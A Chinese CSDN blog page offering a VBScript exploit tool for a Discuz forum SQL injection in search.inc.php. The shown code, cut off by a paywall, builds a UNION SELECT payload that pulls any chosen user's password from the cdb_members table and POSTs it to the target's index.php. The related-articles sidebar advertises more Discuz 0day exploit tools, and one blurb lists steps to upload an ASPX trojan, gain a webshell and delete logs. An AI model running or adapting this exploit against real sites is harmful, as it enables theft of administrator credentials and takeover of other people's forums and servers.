discuz获取任意管理员密码漏洞利用工具vbs版

最新推荐文章于 2024-10-05 08:57:27 发布
最新推荐文章于 2024-10-05 08:57:27 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: 工具 python action path wap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gengjindong/article/details/2832085
版权
本文提供了一个VBS版本的Discuz获取任意管理员密码的漏洞利用工具。通过修改并运行代码,可以利用search.inc.php文件中的漏洞,获取指定UID的管理员密码。用户需提供站点地址、路径和UID,程序会将结果输出到result.txt文件中。
摘要由CSDN通过智能技术生成
 本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版 
 
也利于修改 
 
以下是search.inc.php 文件漏洞利用代码VBS版 
 
 
Dim strUrl,strSite,strPath,strUid 
 
showB() 
Set Args = Wscript.Arguments 
 
If Args.Count <> 3 Then 
ShowU() 
Else 
strSite=Args(0) 
strPath=Args(1) 
strUid=Args(2) 
End If 
 
strUrl="action=search&searchid=22%cf’ UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" 
 
   Set objXML = CreateObject("Microsoft.XMLHTTP") 
   objXML.Open "POST",strSite & strPath & "index.php", False 
   objXML.SetRequestHeader "Accept", "*/*" 
   objXML.SetRequestHeader "Accept-Language", "zh-cn" 
   objXML.SetRequestHeader "Content-Type", &#
最低0.47元/天 解锁文章
gengjindong
关注
专栏目录
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
政政Discuz!NT 2.5.0 漏洞利用工具 1
02-11
软件名:政政Discuz!NT 2.5.0 漏洞利用工具 1.0 程序帮助: 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号,提权成为管理员 3、更新ASPX为可上传,主要是为了上传ASPX木马的 4、去发表一个帖子,把你的ASPX木马上传上去。 5、去后台找附件的绝对路径,登陆你的ASPX木马 6、删除前台自己发的帖子,保留附件 7、更新ASPX不可上传,取后门 8、删除自己的相关日志 9、取消自己的管理员身份 10、完毕,成功拿到一台webshell ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!
discuz faq.php,Python Discuz 7.2 faq.php 注入漏洞全自动利用工具
weixin_42512798的博客
03-10 159
#!/usr/bin/envpython#-*-coding:gbk-*-#-*-coding:gb2312-*-#-*-coding:utf_8-*-#authoriswinimportsysimporthashlibimporttimeimportmathimportbase64importurllib2importurllibimportrede...
discuz 任意管理员密码漏洞利用工具 vbs代码
09-05
在这个特定的情况下,我们讨论的是一个针对 Discuz 管理员密码漏洞利用工具,该工具是用 VBScript (Visual Basic Script) 编写的。VBScript 是一种轻量级的脚本语言,常用于 Windows 环境中的自动化任务和网页交互...
DISCUZ 论坛管理员密码忘记的解决方法
10-29
综上所述,对于DISCUZ论坛管理员密码忘记的情况,可以通过修改存储在数据库中的加密密码来解决问题。由于密码经过了加密处理,必须使用相同的加密算法对新密码进行加密后才能进行替换。此外,管理员在操作数据库时应...
discuz 修改创始人密码管理员登录密码的方法
09-28
本文将详细介绍如何在 Discuz 中修改创始人密码以及管理员登录密码。 首先,我们来讨论如何修改管理员登录密码。这个过程相对直观,但可能对初学者来说不太明显。以下步骤将指导你完成这一过程: 1. 首先,你需要...
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
dz 0day漏洞大家快啊
06-07
dz 0day漏洞 啊 下载吧 大力支持 啊
网络安全实战之discuz上传漏洞利用
weixin_44255593的博客
02-16 6121
攻击思路: 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器本,操作系统本。找漏洞 2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权 3、传上去后,得到apache用户普通权限,再提权成root 概述: 这突破在一个DZ X系列自带的转换工具里面。 漏洞路径:utility / convert / data / config.inc.php 漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,
discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造攻击利用与修复
网站安全专家
12-10 9640
2018年12月9日,国内某安全组织,对discuz X3.2 X3.4本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞是discuz 的用户前段SQL注入与请求伪造漏洞,也俗称SSRF漏洞,漏洞产生的原因首先:php环境的本大约PHP5.2,dizcuzX3.2 X3.4本,服务器环境是windows 2008 2003 2012系统,linux centos不受此漏洞的影响。 漏...
discuz漏洞汇总
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Discuz漏洞
W_seventeen的博客
08-01 4939
1、漏洞描述 Discuz国际漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
discuz!ML 3.x代码执行漏洞的利用 笔记
边城浪子的博客
09-18 1377
服务器:windows 2003 攻击机:windows 10 搭建过程:下载discuz!ML 3.x源码 链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码:5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...
Discuz! 6.0.0 0Day漏洞
weixin_33936401的博客
11-26 948
来源:坏狼安全网// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) {@extract($_POST, EXTR_S...
绕过discuz论坛阅读或下载权限
热门推荐
.
07-18 5万+
discuz X3.1  文件下载提权方案 利用工具和条件: 1.站长工具base64在线加解密 http://tool.chinaz.com/Tools/Base64.aspx 2.能正常登录的普通帐号 3.能浏览vip专区的内容,但是文件的下载链接为没有权限的链接 思路是以管理员的uid欺骗站点放出权限 Discuz的附件下载地址是类似forum.php?mod
Python3 解释器
最新发布
Java_fenxiang的博客
10-05 525
Linux/Unix的系统上,一般默认的 python 本为 2.x,我们可以将 python3.x 安装在/usr/local/python3目录中。安装完成后,我们可以将路径/usr/local/python3/bin添加到您的 Linux/Unix 操作系统的环境变量中,这样您就可以通过 shell 终端输...
Discuz!X安全漏洞详解
6. **UChome插件**:UChome是Discuz的一个社交组件,`ac=blog&blogid=1`表明存在博客管理功能的漏洞,攻击者可以尝试利用这个点来操控博客数据。 7. **交友插件-jiaoyou.php**:这里的`pid`和`mod=search&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值